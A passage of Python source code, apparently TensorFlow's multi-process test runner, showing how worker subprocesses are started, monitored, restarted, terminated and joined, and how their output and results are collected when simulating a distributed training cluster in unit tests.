args=None,
kwargs=None):
"""Start a subprocess and a thread the reads lines from the subprocess."""
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
cluster_spec = cluster_spec or self._cluster_spec
visible_gpus = None
if not self._share_gpu and self._total_gpu > 0:
# Assign GPUs in a roundrobin fashion.
id_in_cluster = multi_worker_util.id_in_cluster(cluster_spec, task_type,
task_id)
worker_count = multi_worker_util.worker_count(cluster_spec, task_type)
visible_gpus = list(range(id_in_cluster, self._total_gpu, worker_count))
test_env = TestEnvironment(
task_type=task_type,
task_id=task_id,
cluster_spec=cluster_spec,
rpc_layer=self._rpc_layer,
grpc_fail_fast=self._grpc_fail_fast,
v2_enabled=self._v2_enabled,
executing_eagerly=self._executing_eagerly,
visible_gpus=visible_gpus,
)
pipe_r, pipe_w = multiprocessing.Pipe(duplex=False)
resources = Resources(
process_status_queue=self._process_status_queue,
parent_to_sub_queue=self._parent_to_sub_queue,
streaming_pipe_w=pipe_w,
barrier=self._barrier,
)
if fn is None:
fn, args, kwargs = self._fn, self._args, self._kwargs
# Always use dill to pickle fn so that we support more callable
# types, e.g. lambda.
fn = dill.dumps(fn, dill.HIGHEST_PROTOCOL)
if self._use_dill_for_args:
args = dill.dumps(args, dill.HIGHEST_PROTOCOL)
kwargs = dill.dumps(kwargs, dill.HIGHEST_PROTOCOL)
p = _Process(
test_env=test_env,
target=_ProcFunc(),
args=(resources, test_env, fn, args, kwargs, self._use_dill_for_args),
daemon=self._daemon)
p.start()
self._processes[(task_type, task_id)] = p
self._terminated.discard((task_type, task_id))
# For each subprocess, we dedicate a thread continuously reading lines
# from them.
thread = threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._continuously_readline_from_sub,
args=(pipe_r, task_type, task_id))
thread.start()
self._reading_threads.append(thread)
if self._watchdog_thread is None or not self._watchdog_thread.is_alive():
self._watchdog_thread = threading.Thread(target=self._process_watchdog)
self._watchdog_thread.start()
def start(self):
"""Starts processes, one for each task in `cluster_spec`.
Note that this is best effort by the applicable multiprocessing library,
and it may take up to seconds for a subprocess to be successfully started.
"""
with self._process_lock:
if self._processes:
raise ValueError('MultiProcessRunner already started.')
if self._joined:
raise ValueError('cannot start new processes after'
'MultiProcessRunner.join() is called')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
self._start_subprocess_and_reading_thread(task_type, task_id)
# TODO(rchao): Remove the need of using SIGALRM if possible. At this time,
# without this the tests become very flaky.
if self._max_run_time is not None:
def handler(signum, frame):
del signum, frame
self.terminate_all()
signal.signal(signal.SIGALRM, handler)
signal.alarm(self._max_run_time)
def start_in_process_as(self, as_task_type, as_task_id):
"""Start the processes, with the specified task run in main process.
This is similar to `start()` except that the task with task_type
`as_task_type` and task_id `as_task_id` is run in the main process.
This method is particularly useful when debugging tool such as `pdb` is
needed in some specific task. Note that since this method is blocking until
that specific task exits, additional actions would need a thread to be
called:
```python
def fn():
# user code to be run
import pdb; pdb.set_trace()
def follow_ups():
time.sleep(5)
mpr.start_single_process(
task_type='evaluator',
task_id=0)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1))
threading.Thread(target=follow_ups).start()
mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
mpr.join()
```
Note that if `return_output=True`, the logs/stdout by task
run by the main process is not available in result.stdout.
Args:
as_task_type: The task type to be run in the main process.
as_task_id: The task id to be run in the main process.
"""
if self._processes:
raise ValueError('MultiProcessRunner already started.')
with self._process_lock:
if self._joined:
raise ValueError('cannot start new processes after'
'MultiProcessRunner.join() is called')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
if not (task_type == as_task_type and task_id == as_task_id):
self._start_subprocess_and_reading_thread(task_type, task_id)
_set_tf_config(as_task_type, as_task_id, self._cluster_spec,
self._rpc_layer)
self._fn(*self._args, **self._kwargs)
def start_single_process(self,
task_type,
task_id,
cluster_spec=None,
fn=None,
args=None,
kwargs=None):
"""Starts a single process.
This starts a process in the cluster with the task type, task id, and the
process function (`fn`). If process function is `None`, the function
provided at `__init__` will be used. If `cluster_spec` is `None`, the
cluster spec provided at `__init__` will be used.
TODO(rchao): It is meant that all subprocesses will be updated with the new
cluster spec, but this has yet to be implemented. At this time only the
newly started subprocess picks up this updated cluster spec.
Args:
task_type: The task type.
task_id: The task id.
cluster_spec: The cluster spec to be used on the newly started
process. If `None`, the cluster spec provided at `__init__` will be
used.
fn: The process function to be run on the newly started
process. If specified, specify `args` and `kwargs` as well. If `None`,
the function provided at `__init__` will be used.
args: Optional positional arguments to be supplied in `fn`.
kwargs: Optional keyword arguments to be supplied in `fn`.
"""
with self._process_lock:
if self._joined:
raise ValueError('cannot start new processes after'
'MultiProcessRunner.join() is called')
self._start_subprocess_and_reading_thread(
task_type,
task_id,
cluster_spec=cluster_spec,
fn=fn,
args=args or (),
kwargs=kwargs or {})
def _queue_to_list(self, queue_to_convert):
"""Convert `queue.Queue` to `list`."""
list_to_return = []
# Calling `queue.empty()` is not reliable.
while True:
try:
list_to_return.append(queue_to_convert.get(block=False))
except Queue.Empty:
break
return list_to_return
def _get_process_statuses(self):
# One worker may have multiple statuses. We only keep the last one.
statuses = {}
for status in self._queue_to_list(self._process_status_queue):
statuses[(status.task_type, status.task_id)] = status
return statuses
def get_process_id(self, task_type, task_id):
"""Returns the subprocess id given the task type and task id."""
with self._process_lock:
p = self._processes.get((task_type, task_id), None)
return p.pid if p else None
def get_process_exit_code(self, task_type, task_id):
"""Returns the subprocess exit code given the task type and task id.
Args:
task_type: The task type.
task_id: The task id.
Returns:
The subprocess exit code; `None` if the subprocess has not exited yet.
Raises:
KeyError: If the corresponding subprocess is not found with `task_type`
and `task_id`.
"""
with self._process_lock:
p = self._processes[(task_type, task_id)]
return p.exitcode if p else None
def process_exists(self, task_type, task_id):
"""Returns whether the subprocess still exists given the task type and id.
Args:
task_type: The task type.
task_id: The task id.
Returns:
Boolean; whether the subprocess still exists. If the subprocess has
exited, this returns False.
"""
return self.get_process_exit_code(task_type, task_id) is None
def _process_watchdog(self):
"""Simulates a cluster management system.
- If auto_restart is True, it restarts processes that exit with a non-zero
exit code. Note that when join() times out it overrides auto_restart to
False.
- If dependence_on_chief is True, it terminates all processes once the chief
exits. If auto_restart is also True, it only terminates all processes if
the chief exit with a zero exit code, otherwise it restarts the chief.
This runs in self._watchdog_thread.
"""
while True:
time.sleep(1)
with self._process_lock:
chief = self._processes.get(('chief', 0), None)
# Terminate the cluster when _dependence_on_chief is True if either:
# - chief has exited with zero exit code.
# - chief has exited with non-zero exit code and self._auto_restart is
# False.
if chief and self._dependence_on_chief and chief.exitcode is not None:
if chief.exitcode == 0 or (not self._auto_restart):
for p in self._processes.values():
# Give other processes a chance to exit on their own.
p.join(timeout=3)
self._terminate_all()
for p in self._processes.values():
p.join()
return
# Auto restart failed processes if self._auto_restart is True.
if self._auto_restart:
has_failure = False
for (task_type, task_id), p in self._processes.items():
if p.exitcode is not None and p.exitcode != 0:
has_failure = True
logging.info('Restarting failed %s-%d', task_type, task_id)
self._start_subprocess_and_reading_thread(task_type, task_id)
if has_failure:
continue
# Exit the thread if all processes have exited at this point.
if all(p.exitcode is not None for p in self._processes.values()):
return
def _reraise_if_subprocess_error(self, process_statuses):
for process_status in process_statuses.values():
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
process_status.exc_info[1].mpr_result = self._get_mpr_result(
process_statuses)
six.reraise(*process_status.exc_info)
def join(self, timeout=_DEFAULT_TIMEOUT_SEC):
"""Joins all the processes with timeout.
If any of the subprocesses does not exit approximately after `timeout`
seconds has passed after `join` call, this raises a
`SubprocessTimeoutError`.
Note: At timeout, it uses SIGTERM to terminate the subprocesses, in order to
log the stack traces of the subprocesses when they exit. However, this
results in timeout when the test runs with tsan (thread sanitizer); if tsan
is being run on the test targets that rely on timeout to assert information,
`MultiProcessRunner.terminate_all()` must be called after `join()`, before
the test exits, so the subprocesses are terminated with SIGKILL, and data
race is removed.
Args:
timeout: optional integer or `None`. If provided as an integer, and not
all processes report status within roughly `timeout` seconds, a
`SubprocessTimeoutError` exception will be raised. If `None`, `join` never
times out.
Returns:
A `MultiProcessRunnerResult` object, which has two attributes,
`return_value` and `stdout`. `return_value` always contains a list of
return values from the subprocesses, although the order is not meaningful.
If `return_output` argument is True at `__init__`, `stdout` is available
that contains a list of all messages from subprocesses' stdout and stderr.
Raises:
SubprocessTimeoutError: if not all processes report status approximately
within `timeout` seconds. When this is raised, a
`MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute, which has the same
structure as above 'Returns' section describes.
UnexpectedSubprocessExitError: If any of the subprocesses did not exit
properly (for example, they exit on SIGTERM or SIGKILL signal). When
this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
same structure as above 'Returns' section describes. If `max_run_time`
is not `None`, it is expected that some subprocesses may be
force-killed when `max_run_time` is up, and this is raised in those
cases.
Exception: if there is an Exception propagated from any subprocess. When
this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
same structure as above 'Returns' section describes.
"""
if timeout and not isinstance(timeout, int):
raise ValueError('`timeout` must be an integer or `None`.')
with self._process_lock:
if self._joined:
raise ValueError("MultiProcessRunner can't be joined twice.")
self._joined = True
self._watchdog_thread.join(timeout)
if self._watchdog_thread.is_alive():
# Timeout. Force termination to dump worker processes stack trace.
with self._process_lock:
self._auto_restart = False
logging.error('Timeout when joining for child processes. Terminating...')
self.terminate_all(sig=signal.SIGTERM)
# Wait for the processes to terminate by themselves first, so they have a
# chance to dump stacktraces. After _FORCE_KILL_WAIT_SEC, we SIGKILL them.
self._watchdog_thread.join(_FORCE_KILL_WAIT_SEC)
if self._watchdog_thread.is_alive():
logging.error('Timeout when waiting for child processes to '
'print stacktrace. Sending SIGKILL...')
self.terminate_all()
self._watchdog_thread.join()
process_statuses = self._get_process_statuses()
self._reraise_if_subprocess_error(process_statuses)
raise SubprocessTimeoutError(
'One or more subprocesses timed out, where timeout was set to {}s. '
'Please change the `timeout` argument for '
'`MultiProcessRunner.join()` or `multi_process_runner.run()` '
'if it should be adjusted.'.format(timeout),
self._get_mpr_result(process_statuses))
for (task_type, task_id), p in self._processes.items():
logging.info('%s-%d exit code: %s', task_type, task_id, p.exitcode)
process_statuses = self._get_process_statuses()
self._reraise_if_subprocess_error(process_statuses)
# Checking all the processes that are expected to exit properly.
for (task_type, task_id), p in self._processes.items():
# Successfully exiting process has exit code 0. We ignore processes that
# are terminated.
assert p.exitcode is not None
if (p.exitcode > 0 and (task_type, task_id) not in self._terminated):
raise UnexpectedSubprocessExitError(
'Subprocess %s-%d exited with exit code %s. See logs for details.'
% (task_type, task_id, p.exitcode),
self._get_mpr_result(process_statuses))
logging.info('Joining log reading threads.')
for thread in self._reading_threads:
thread.join()
logging.info('Joined log reading threads.')
# Clear the alarm.
signal.alarm(0)
return self._get_mpr_result(process_statuses)
def _get_mpr_result(self, process_statuses):
stdout = self._queue_to_list(self._streaming_queue)
return_values = []
for process_status in process_statuses.values():
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return MultiProcessRunnerResult(stdout=stdout, return_value=return_values)
def terminate(self, task_type, task_id):
"""Terminates the process with `task_type` and `task_id`.
If auto_retart=True, the terminated task will be restarted unless the chief
has already exited with zero exit code.
Args:
task_type: the task type.
task_id: the task id.
"""
with self._process_lock:
p = self._processes.get((task_type, task_id), None)
if p is None:
raise ValueError('{}-{} does not exist'.format(task_type, task_id))
self._terminated.add((task_type, task_id))
# TODO(crccw): change to use Process.terminate() as well.
self._parent_to_sub_queue.put('terminate {} {}'.format(
task_type, task_id))
p.join()
def _terminate_all(self, sig=None):
"""Terminates all subprocesses.
The caller is required to hold self._process_lock.
Args:
sig: the signal used to terminate the process. The default is SIGKILL.
"""
# Use SIGKILL as default. In systems where that's unavailable such as
# windows, use SIGTERM.
sig = sig or getattr(signal, 'SIGKILL', signal.SIGTERM)
for (task_type, task_id), p in self._processes.items():
if p.exitcode is not None:
logging.info('%s-%d has already exited. Not terminating.', task_type,
task_id)
continue
try:
os.kill(p.pid, sig)
self._terminated.add((task_type, task_id))
logging.info('%s-%d terminated with signal %r.', task_type, task_id,
sig)
except ProcessLookupError:
logging.info('Attempting to kill %s-%d but it does not exist.',
task_type, task_id)
def terminate_all(self, sig=None):
"""Terminates all subprocesses."""
with self._process_lock:
self._terminate_all(sig)
class _Process(multi_process_lib.Process):
"""A modified `multiprocessing.Process` that can set up environment variables."""
# TODO(crccw): consider moving other logics in _ProcFunc to _Process.
def __init__(self, test_env, **kwargs):
super(_Process, self).__init__(**kwargs)
self._test_env = test_env
self._actual_run = getattr(self, 'run')
self.run = self._run_with_setenv
def _run_with_setenv(self):
# We need to set environment variables before doing anything because
# setenv() is not thread-safe.
test_env = self._test_env
if test_env.grpc_fail_fast is not None:
os.environ['GRPC_FAIL_FAST'] = str(test_env.grpc_fail_fast)
if test_env.visible_gpus:
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(
[str(i) for i in test_env.visible_gpus])
_set_tf_config(test_env.task_type, test_env.task_id, test_env.cluster_spec,
test_env.rpc_layer)
return self._actual_run()
class _ProcFunc(object):
"""Represents a callable to run in a subprocess."""
@contextlib.contextmanager
def _runtime_mode(self, executing_eagerly):
if executing_eagerly:
with context.eager_mode():
yield
else:
with context.graph_mode():
yield
def _message_checking_func(self, task_type, task_id):
"""A function that regularly checks messages from parent process."""
# TODO(rchao): Remove this once parent uses SIGKILL to terminate subprocess.
while True:
try:
message = self._resources.parent_to_sub_queue.get(block=False)
# Currently the only possible message is termination.
if not message.startswith('terminate'):
raise ValueError('Unrecognized message: {}'.format(message))
if message == 'terminate {} {}'.format(task_type, task_id):
break
else:
# If the message is not targeting this process, put it back to the
# queue.
self._resources.parent_to_sub_queue.put(message)
time.sleep(1)
except Queue.Empty:
time.sleep(0.1)
self._resources.process_status_queue.put(
_ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=True,
exc_info=None,
return_value=None))
# `os._exit(1)` is used to more reliably terminate a subprocess.
os._exit(1) # pylint: disable=protected-access
def _close_streaming(self):
"""Close stdout, stderr and streaming pipe.
We need to explicitly close them since Tensorflow may take a while to exit,
so that the reading threads in the main process can exit more quickly.
"""
sys.stdout.flush()
sys.stderr.flush()
sys.stdout.close()
sys.stderr.close()
self._resources.streaming_pipe_w.close()
def __call__(self, resources, test_env, fn, args, kwargs, use_dill_for_args):
"""The wrapper function that actually gets run in child process(es)."""
global _barrier
self._resources = resources
_barrier = self._resources.barrier
fn = dill.loads(fn)
if use_dill_for_args:
args = dill.loads(args)
kwargs = dill.loads(kwargs)
if faulthandler is not None:
faulthandler.enable()
faulthandler.register(signal.SIGTERM, chain=True)
# All logging should go to stderr to be streamed to the main process.
logging.set_stderrthreshold(logging.DEBUG)
# Assign sys.stdout and sys.stderr as duplicates of `streaming_pipe_w` so
# print() and logging.*() write directly to `streaming_pipe_w`.
# Unfortunately since we cannot prepend task_type and task_id information to
# the streamed logs we will need a thread per subprocess to distinguish
# where the piece of message is from.
os.dup2(resources.streaming_pipe_w.fileno(), sys.stdout.fileno())
os.dup2(resources.streaming_pipe_w.fileno(), sys.stderr.fileno())
pid = os.getpid()
logging.info('Subprocess with PID %d (%s, %d) is now being started.', pid,
test_env.task_type, test_env.task_id)
logging.info('TF_CONFIG: %r', os.environ['TF_CONFIG'])
# The thread will be dedicated to checking messages from the parent process.
threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._message_checking_func,
args=(test_env.task_type, test_env.task_id),
daemon=True).start()
if test_env.v2_enabled:
v2_compat.enable_v2_behavior()
with self._runtime_mode(test_env.executing_eagerly):
info = _run_contained(test_env.task_type, test_env.task_id, fn, args,
kwargs)
self._resources.process_status_queue.put(info)
# Re-raise the exception in addition to reporting it to the parent
# process, so that even if `--test_timeout` flag is set and the
# error doesn't make it to be shown in parent process before bazel's
# timeout, the log would still show what happens in this subprocess,
# instead of silently suppressing the error due to early bazel
# timeout. Raising an error in the subprocess produces stack trace in
# the log, but the program continues running.
if not info.is_successful:
six.reraise(*info.exc_info)
self._close_streaming()
# Exit with code 0 as it's considered successful exit at this point.
sys.exit(0)
# Active MultiProcessPoolRunner. We need to shut them down when the program
# exits, and this is by setting the `tearDownModule` of the module containing
# `__main__`. Note this it set in both the parent process and the subprocesses.
_active_pool_runners = weakref.WeakSet()
def _shutdown_all_pool_runners():
for pool in _active_pool_runners:
pool.shutdown()
def is_oss():
"""Returns whether the test is run under OSS."""
return len(sys.argv) >= 1 and 'bazel' in sys.argv[0]
class MultiProcessPoolRunner(object):
"""A utility class to start a process pool to simulate a cluster.
It's similar to MultiProcessRunner, but uses a pool of processes to avoid the
expensive initialization cost of Tensorflow.
"""
def __init__(self, cluster_spec, initializer=None, share_gpu=True):
"""Creates a multi-process pool runner.
Args:
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"]}
initializer: a callable to called at the startup of worker processes.
share_gpu: Whether to share GPUs among workers. If False, each worker is
assigned different GPUs in a roundrobin fashion.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
_active_pool_runners.add(self)
self._cluster_spec = cluster_spec
self._initializer = initializer
self._share_gpu = share_gpu
self._conn = {}
self._runner = None
def __del__(self):
self.shutdown()
def shutdown(self):
"""Shuts down the worker pool."""
for conn in self._conn.values():
conn.close()
self._conn = {}
if self._runner is not None:
try:
self._runner.join()
except Exception as e: # pylint: disable=broad-except
logging.error(
'Ignoring exception when shutting down MultiProcessPoolRunner: %s',
e)
self._runner = None
def _start(self):
"""Starts the worker pool."""
# We need different arguments for different processes so we're passing a
# no-op fn here and use start_single_process instead.
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
self._runner = MultiProcessRunner(
fn=lambda: None,
cluster_spec=self._cluster_spec,
use_dill_for_args=False,
share_gpu=self._share_gpu)
if self._initializer:
initializer = dill.dumps(self._initializer, dill.HIGHEST_PROTOCOL)
else:
initializer = None
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
conn1, conn2 = multiprocessing.Pipe(duplex=True)
self._conn[(task_type, task_id)] = conn1
self._runner.start_single_process(
task_type,
task_id,
fn=_pool_runner_worker,
args=(task_type, task_id, initializer, conn2))
def run(self, fn, args=None, kwargs=None):
"""Runs `fn` with `args` and `kwargs` on all jobs.
Args:
fn: The function to be run.
args: Optional positional arguments to be supplied in `fn`.
kwargs: Optional keyword arguments to be supplied in `fn`.
Returns:
A list of return values.
"""
_check_initialization()
# TODO(b/150264776): skip in OSS until it's implemented.
multi_process_lib.Process()
if self._runner is None:
self._start()
fn = dill.dumps(fn, dill.HIGHEST_PROTOCOL)
for conn in self._conn.values():
conn.send((fn, args or [], kwargs or {}))
process_statuses = []
for (task_type, task_id), conn in self._conn.items():
logging.info('Waiting for the result from %s-%d', task_type, task_id)
try:
process_statuses.append(conn.recv())
except EOFError:
# This shouldn't happen due to exceptions in fn. This usually
# means bugs in the runner.
self.shutdown()
raise RuntimeError('Unexpected EOF. Worker process may have died. '
'Please report a bug')
return_values = []
for process_status in process_statuses:
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
six.reraise(*process_status.exc_info)
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return return_values
def _pool_runner_worker(task_type, task_id, initializer, conn):
"""Function that runs on the workers in a pool.
It listens for callables to run and returns the result until `conn` is closed.
It captures the exceptions during executing the callable and return it through
`conn`.
Args:
task_type: the task type.
task_id: the task index.
initializer: a callable to execute during startup.
conn: a multiprocessing.Connection object to listen for tasks and send
results.
"""
if initializer:
initializer = dill.loads(initializer)
initializer()
while True:
try:
fn, args, kwargs = conn.recv()
except EOFError:
break
fn = dill.loads(fn)
info = _run_contained(task_type, task_id, fn, args, kwargs)
sys.stdout.flush()
sys.stderr.flush()
conn.send(info)
def _run_contained(task_type, task_id, fn, args, kwargs):
"""Runs `fn` with `args` and `kwargs`.
The function returns _ProcessStatusInfo which captures the return value and
the exception.
Args:
task_type: the task type.
task_id: the task index.
fn: the function to be run.
args: optional positional arguments to be supplied in `fn`.
kwargs: optional keyword arguments to be supplied in `fn`.
Returns:
a _ProcessStatusInfo.
"""
is_successful = False
return_value = None
exc_info = None
try:
return_value = fn(*args, **kwargs)
is_successful = True
return _ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
# If `fn` ends up exiting with `sys.exit()`, the `SystemExit` is not
# handled here.
except Exception: # pylint: disable=broad-except
exc_info = sys.exc_info()
return _ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
@tf_export('__internal__.distribute.multi_process_runner'
'.SubprocessTimeoutError',
v1=[])
class SubprocessTimeoutError(RuntimeError):
"""An error that indicates there is at least one subprocess timing out.
When this is raised, a namedtuple object representing the multi-process run
result can be retrieved by
`tf.__internal__.distribute.multi_process_runner.SubprocessTimeoutError`'s
`mpr_result` attribute. See
`tf.__internal__.distribute.multi_process_runner.run` for more information.
"""
def __init__(self, msg, mpr_result):
super(SubprocessTimeoutError, self).__init__(msg)
self.mpr_result = mpr_result
@tf_export('__internal__.distribute.multi_process_runner'
'.UnexpectedSubprocessExitError',
v1=[])
class UnexpectedSubprocessExitError(RuntimeError):
"""An error indicating there is at least one subprocess with unexpected exit.
When this is raised, a namedtuple object representing the multi-process run
result can be retrieved by
`tf.__internal__.distribute.multi_process_runner
.UnexpectedSubprocessExitError`'s
`mpr_result` attribute. See
`tf.__internal__.distribute.multi_process_runner.run` for more information.
"""
def __init__(self, msg, mpr_result):
super(UnexpectedSubprocessExitError, self).__init__(msg)
self.mpr_result = mpr_result
@tf_export(
'__internal__.distribute.multi_process_runner.NotInitializedError', v1=[])
class NotInitializedError(RuntimeError):
"""An error indicating `multi_process_runner.run` is used without init.
When this is raised, user is supposed to call
`tf.__internal__.distribute.multi_process_runner.test_main()` within
`if __name__ == '__main__':` block to properly initialize
`multi_process_runner.run`.
"""
pass
def _check_initialization():
if not multi_process_lib.initialized():
raise NotInitializedError(
'`multi_process_runner` is not initialized. '
'Please call `tf.__internal__.distribute.multi_process_runner.'
'test_main()` within `if __name__ == \'__main__\':` block '
'in your python module to properly initialize '
'`multi_process_runner`.')
def _set_tf_config(task_type, task_id, cluster_spec, rpc_layer=None):
"""Set TF_CONFIG environment variable."""
tf_config_dict = {
'cluster': cluster_spec,
'task': {
'type': task_type,
'index': task_id,
},
}
if rpc_layer is not None:
tf_config_dict['rpc_layer'] = rpc_layer
os.environ['TF_CONFIG'] = json.dumps(tf_config_dict)
@tf_export('__internal__.distribute.multi_process_runner.run', v1=[])
def run(fn,
cluster_spec,
rpc_layer=None,
max_run_time=None,
return_output=False,
timeout=_DEFAULT_TIMEOUT_SEC,
args=None,
kwargs=None):
"""Run `fn` in multiple processes according to `cluster_spec`.
Given a callable `fn`, `tf.__internal__.distribute.multi_process_runner.run`
launches multiple processes, each of which runs `fn`. These processes are
referred to as "subprocesses" or "child processes". Each of those subprocesses
will have their `TF_CONFIG` environment variable set, according to
`cluster_spec` and their task types. The stdout of the subprocesses are
streamed to the main process' and thus available in logs (if `stream_output`
is True), with [type-id] prefix.
`tf.__internal__.distribute.multi_process_runner.run` will block until all
subprocesses have successfully exited, and return a namedtuple object that
represents the run result. This object has a `return_value` attribute, which
is a list that contains subprocesses `fn`'s return values, for those
subprocesses that successfully returned from `fn`. The order of `return_value`
list is not meaningful. If an optional arg `return_output` (default to False)
is set to True, the namedtuple object will have an additional attribute
`stdout`, which is a list containing the stdout of the subprocesses. If any
subprocess' `fn` ends up raising an error, that error will be reraised from
`tf.__internal__.distribute.multi_process_runner.run`, and the aforementioned
namedtuple object will be available through the exception's
`mpr_result` attribute.
This utility is used for simulating running TensorFlow programs across
multiple task types, and each of the task type may contain more than one task
(except for "chief" where more than one task is prohibited). Test coverage of
multi-worker training is the main application of this utility, where code
written for multi-worker training can be realistically covered in unit tests.
Any test module that uses
`tf.__internal__.distribute.multi_process_runner.run()` must call
`tf.__internal__.distribute.multi_process_runner.test_main()` instead of
regular `test.main()` inside `if __name__ == '__main__':` block for proper
initialization.
Args:
fn: Function to be run on child processes. This will be run on processes for
all task types.
cluster_spec: Dict for cluster spec. The utility function
`tf.__internal__.distribute.multi_process_runner.create_cluster_spec` can
be conveniently used to create such dict. The following is an example of
cluster with three workers and two ps's.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"],
"ps": ["ps0.example.com:2222",
"ps1.example.com:2222"]}
rpc_layer: RPC layer to use. Default value is 'grpc'.
max_run_time: `None` or integer. If not `None`, child processes are forced
to exit at approximately this many seconds after this utility is called.
We achieve this through `signal.alarm()` api. Note that this is best
effort at Python level since Python signal handler does not get executed
when it runs lower level C/C++ code. So it can be delayed for arbitrarily
long time. If any of the child process is still running when
`max_run_time` is up, they will be force-terminated and an
`tf.__internal__.distribute.multi_process_runner
.UnexpectedSubprocessExitError`
may be raised. If `None`, child processes are not forced to exit.
return_output: If True, the output/error from the subprocesses should be
collected to be attached to the resulting namedtuple returned from this
utility. The list of output can be retrieved via `stdout` attribute.
Defaults to False.
timeout: optional integer or `None`. If provided as an integer, and not all
processes report status within roughly `timeout` seconds, a
`tf.__internal__.distribute.multi_process_runner.SubprocessTimeoutError`
exception will be raised. If `None`,
`tf.__internal__.distribute.multi_process_runner.run` never times out.
Defaults to the constant `_DEFAULT_TIMEOUT_SEC` defined in
`multi_process_runner` module.
args: Positional arguments to be sent to `fn` run on subprocesses.
kwargs: Keyword arguments to be sent to `fn` run on subprocesses.
Returns:
A namedtuple object, which has two attributes,
`return_value` and `stdout`. `return_value` always contains a list of
returnvalues from the subprocesses, although the order is not meaningful.
If `return_output` argument is True, `stdout` is available that contains a
list of all messages from subprocesses' stdout and stderr, and the order
is mostly chronological.
Raises:
RuntimeError: if
`tf.__internal__.distribute.multi_process_runner.test_main()` is
not called in test's `if __name__ == '__main__':` block.
ValueError: if there are more than one chief in the `cluster_spec`.
tf.__internal__.distribute.multi_process_runner.SubprocessTimeoutError: if
not all processes report status approximately
within `timeout` seconds. When this is raised, a
namedtuple object can be retrieved by
`tf.__internal__.distribute.multi_process_runner.SubprocessTimeoutError`'s
`mpr_result` attribute, which has the same
structure as above 'Returns' section describes.
tf.__internal__.distribute.multi_process_runner
.UnexpectedSubprocessExitError:
If any of the subprocesses did not exit
properly (for example, they exit on SIGTERM or SIGKILL signal). When
this is raised, a namedtuple object can be retrieved by
`tf.__internal__.distribute.multi_process_runner
.UnexpectedSubprocessExitError`'s
`mpr_result` attribute, which has the
same structure as above 'Returns' section describes. If `max_run_time`
is not `None`, it is expected that some subprocesses may be
force-killed when `max_run_time` is up, and this is raised in those
cases.
Exception: if there is an Exception propagated from any subprocess. When
this is raised, a namedtuple object can be retrieved by
`tf.__internal__.distribute.multi_process_runner
.UnexpectedSubprocessExitError`
`mpr_result` attribute, which has the
same structure as above 'Returns' section describes.
Examples:
```python
class SimpleMultiProcessTest(tf.test.TestCase):
def test_simple_printing_and_return(self):
def fn():
resolver = tf.distribute.cluster_resolver.TFConfigClusterResolver()
# This will print "[chief-0]: Task type: chief , task id: 0"
# for chief, for example.
logging.info('Task type: %s, task id: %d',
resolver.task_type, resolver.task_id)
return resolver.task_type
result = tf.__internal__.distribute.multi_process_runner.run(
fn=fn,
cluster_spec=(
tf.__internal__
.distribute.multi_process_runner.create_cluster_spec(
has_chief=True, num_workers=2)))
assert sorted(result.return_value) == ['chief', 'worker', 'worker']
def test_error_from_fn(self):
def fn():
resolver = tf.distribute.cluster_resolver.TFConfigClusterResolver()
raise ValueError('Task type {}, task id {} is errors out'.format(
resolver.task_type, resolver.task_id))
with self.assertRaisesRegexp(ValueError,
'Task type worker, task id 0 is errors out'):
cluster_spec = (
tf.__internal__.distribute.multi_process_runner.create_cluster_spec(
num_workers=1))
tf.__internal__.distribute.multi_process_runner.run(
fn=fn, cluster_spec=cluster_spec)
if __name__ == '__main__':
tf.__internal__.distribute.multi_process_runner.test_main()
```
"""
runner = MultiProcessRunner(
fn,
cluster_spec,
rpc_layer,
max_run_time=max_run_time,
return_output=return_output,
args=args,
kwargs=kwargs)
runner.start()
return runner.join(timeout)
# This is set by MultiProcessRunner in worker processes.
_barrier = None
@tf_export('__internal__.distribute.multi_process_runner.get_barrier', v1=[])
def get_barrier():
"""Returns a `multiprocessing.Barrier` for `multi_process_runner.run`.
`tf.__internal__.distribute.multi_process_runner.get_barrier()` returns
a `multiprocessing.Barrier` object which can be used within `fn` of
`tf.__internal__.distribute.multi_process_runner` to wait with
`barrier.wait()` call until all other tasks have also reached the
`barrier.wait()` call, before they can proceed individually.
Note that all tasks (subprocesses) have to reach `barrier.wait()` call to
proceed. Currently it is not supported to block on only a subset of tasks
in the cluster.
Example:
```python
def fn():
some_work_to_be_done_by_all_tasks()
tf.__internal__.distribute.multi_process_runner.get_barrier().wait()
# The barrier guarantees that at this point, all tasks have finished
# `some_work_to_be_done_by_all_tasks()`
some_other_work_to_be_done_by_all_tasks()
result = tf.__internal__.distribute.multi_process_runner.run(
fn=fn,
cluster_spec=(
tf.__internal__
.distribute.multi_process_runner.create_cluster_spec(
num_workers=2)))
```
Returns:
A `multiprocessing.Barrier` for `multi_process_runner.run`.
"""
if _barrier is None:
raise ValueError(
